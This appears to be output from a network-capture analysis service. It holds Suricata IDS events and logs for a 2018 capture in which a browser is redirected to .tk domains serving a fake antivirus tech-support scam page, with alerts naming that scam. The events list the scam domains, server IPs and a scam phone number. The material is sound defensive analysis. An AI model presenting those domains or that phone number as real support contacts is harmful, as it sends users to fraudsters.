{"timestamp":"2018-01-06T02:37:15.835900+0000","flow_id":162823122178298,"pcap_cnt":68,"event_type":"http","src_ip":"10.1.6.102","src_port":50659,"dest_ip":"204.155.28.5","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"richcalling3050112.tk","url":"\/index\/?2101505838590","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2018-01-06T02:37:15.841456+0000","flow_id":778951213176560,"pcap_cnt":69,"event_type":"alert","src_ip":"10.1.6.102","src_port":60808,"dest_ip":"10.1.6.1","dest_port":53,"proto":"UDP","alert":{"action":"allowed","gid":1,"signature_id":2012811,"rev":2,"signature":"ET DNS Query to a .tk domain - Likely Hostile","category":"Potentially Bad Traffic","severity":2},"app_proto":"dns"}
{"timestamp":"2018-01-06T02:37:15.841456+0000","flow_id":778951213176560,"pcap_cnt":69,"event_type":"dns","src_ip":"10.1.6.102","src_port":60808,"dest_ip":"10.1.6.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":11500,"rrname":"richsapport60501123.tk","rrtype":"A","tx_id":0}}
{"timestamp":"2018-01-06T02:37:16.209492+0000","flow_id":778951213176560,"pcap_cnt":70,"event_type":"dns","src_ip":"10.1.6.1","src_port":53,"dest_ip":"10.1.6.102","dest_port":60808,"proto":"UDP","dns":{"type":"answer","id":11500,"rcode":"NOERROR","rrname":"richsapport60501123.tk","rrtype":"A","ttl":5,"rdata":"185.159.83.48"}}
{"timestamp":"2018-01-06T02:37:16.209492+0000","flow_id":778951213176560,"pcap_cnt":70,"event_type":"dns","src_ip":"10.1.6.1","src_port":53,"dest_ip":"10.1.6.102","dest_port":60808,"proto":"UDP","dns":{"type":"answer","id":11500,"rcode":"NOERROR","rrname":"richsapport60501123.tk","rrtype":"A","ttl":5,"rdata":"185.159.83.47"}}
{"timestamp":"2018-01-06T02:37:16.720648+0000","flow_id":1108708064770002,"pcap_cnt":83,"event_type":"alert","src_ip":"10.1.6.102","src_port":50661,"dest_ip":"185.159.83.48","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2012810,"rev":10,"signature":"ET POLICY HTTP Request to a *.tk domain","category":"Potentially Bad Traffic","severity":2},"app_proto":"http"}
{"timestamp":"2018-01-06T02:37:16.805025+0000","flow_id":1108708064770002,"pcap_cnt":89,"event_type":"alert","src_ip":"10.1.6.102","src_port":50661,"dest_ip":"185.159.83.48","dest_port":80,"proto":"TCP","tx_id":1,"alert":{"action":"allowed","gid":1,"signature_id":2012810,"rev":10,"signature":"ET POLICY HTTP Request to a *.tk domain","category":"Potentially Bad Traffic","severity":2},"app_proto":"http"}
{"timestamp":"2018-01-06T02:37:16.805306+0000","flow_id":1108708064770002,"pcap_cnt":91,"event_type":"fileinfo","src_ip":"185.159.83.48","src_port":80,"dest_ip":"10.1.6.102","dest_port":50661,"proto":"TCP","http":{"hostname":"richsapport60501123.tk","url":"\/?number=888-797-7834","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html","http_refer":"http:\/\/www.prelatureofayaviri.org\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":9998},"app_proto":"http","fileinfo":{"filename":"\/","gaps":false,"state":"TRUNCATED","stored":false,"size":9992,"tx_id":0}}
{"timestamp":"2018-01-06T02:37:58.683848+0000","flow_id":1108708064770002,"event_type":"http","src_ip":"10.1.6.102","src_port":50661,"dest_ip":"185.159.83.48","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"richsapport60501123.tk","url":"\/?number=888-797-7834","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2018-01-06T02:37:58.683848+0000","flow_id":1108708064770002,"event_type":"http","src_ip":"10.1.6.102","src_port":50661,"dest_ip":"185.159.83.48","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"richsapport60501123.tk","url":"\/landinf\/defender.png","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko"}}
{"timestamp":"2018-01-06T02:37:58.683848+0000","flow_id":1108708064770002,"event_type":"alert","src_ip":"185.159.83.48","src_port":80,"dest_ip":"10.1.6.102","dest_port":50661,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2023055,"rev":2,"signature":"ET CURRENT_EVENTS Tech Support Phone Scam Landing (err.mp3) Aug 12 2016","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-01-06T02:37:58.683848+0000","flow_id":1108708064770002,"event_type":"alert","src_ip":"185.159.83.48","src_port":80,"dest_ip":"10.1.6.102","dest_port":50661,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2025345,"rev":2,"signature":"ET CURRENT_EVENTS Fake AV Phone Scam Landing Feb 12","category":"A Network Trojan was detected","severity":1}}
{"timestamp":"2018-01-06T02:37:58.683848+0000","flow_id":1108708064770002,"event_type":"alert","src_ip":"185.159.83.48","src_port":80,"dest_ip":"10.1.6.102","dest_port":50661,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2827062,"rev":2,"signature":"ETPRO CURRENT_EVENTS Tech Support Scam Landing Jul 07 2017","category":"A Network Trojan was detected","severity":1}}
{"timestamp":"2018-01-06T02:37:58.683848+0000","flow_id":414823881478399,"event_type":"fileinfo","src_ip":"144.208.76.207","src_port":80,"dest_ip":"10.1.6.102","dest_port":50624,"proto":"TCP","http":{"hostname":"www.prelatureofayaviri.org","url":"\/","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":34997},"app_proto":"http","fileinfo":{"filename":"\/","gaps":false,"state":"CLOSED","stored":false,"size":34475,"tx_id":0}}


keyword_perf.log - (11130 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 11/21/2018 -- 13:05:51
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             1328780         386             386             23612           3442.00         3442.00         0.00           
  content          3542376         620             380             142580          5713.00         4930.00         6954.00        
  pcre             837295          109             43              31456           7681.00         7964.00         7497.00        
  byte_test        140446          38              17              15996           3695.00         4677.00         2901.00        
  isdataat         16754           6               0               2976            2792.00         0.00            2792.00        
  flowbits         15115           1               1               15115           15115.00        15115.00        0.00           
  urilen           281145          85              26              21143           3307.00         3753.00         3111.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             1328780         386             386             23612           3442.00         3442.00         0.00           
  flowbits         15115           1               1               15115           15115.00        15115.00        0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          369237          84              40              25593           4395.00         4899.00         3937.00        
  pcre             51152           4               1               31218           12788.00        31218.00        6644.00        
  byte_test        140446          38              17              15996           3695.00         4677.00         2901.00        
  isdataat         11329           4               0               2976            2832.00         0.00            2832.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          363308          94              58              16321           3864.00         3836.00         3911.00        
  pcre             341962          45              8               22018           7599.00         11400.00        6777.00        
  isdataat         5425            2               0               2809            2712.00         0.00            2712.00        
  urilen           281145          85              26              21143           3307.00         3753.00         3111.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          6478            2               0               3262            3239.00         0.00            3239.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1162064         50              25              142580          23241.00        14666.00        31815.00       
  pcre             75799           4               0               31456           18949.00        0.00            18949.00       
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1139104         260             187             33568           4381.00         4401.00         4329.00        
  pcre             311089          46              24              15208           6762.00         6781.00         6741.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          167739          41              17              15958           4091.00         4235.00         3988.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_type
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          27251           8               8               3888            3406.00         3406.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          113506          26              8               20878           4365.00         4127.00         4471.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          127497          35              25              4656            3642.00         3651.00         3621.00        
  pcre             57293           10              10              11132           5729.00         5729.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          32311           9               9               4516            3590.00         3590.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          33881           11              3               3545            3080.00         3109.00         3069.00        


IDSDeathBlossom.py.log - (1200 bytes) - download
1
2
3
4
5
6
7
8
2018-11-21 13:05:27,086 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2018-11-21 13:05:27,882 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2018-11-21 13:05:27,882 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etpro-all
2018-11-21 13:05:27,883 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2018-11-21 13:05:27,883 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2018-11-21 13:05:27,884 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/ee5317774464e42d2b80588913a4883956b33745cb75ec8c950e11a498e082d2 -r /var/pcap/11212018.1305-2018-01-06-fake-AV-page-after-viewing-prelatureofayaviri.org.pcap -vvv -k none
2018-11-21 13:05:51,312 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2018-11-21 13:05:51,312 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 24.2399001122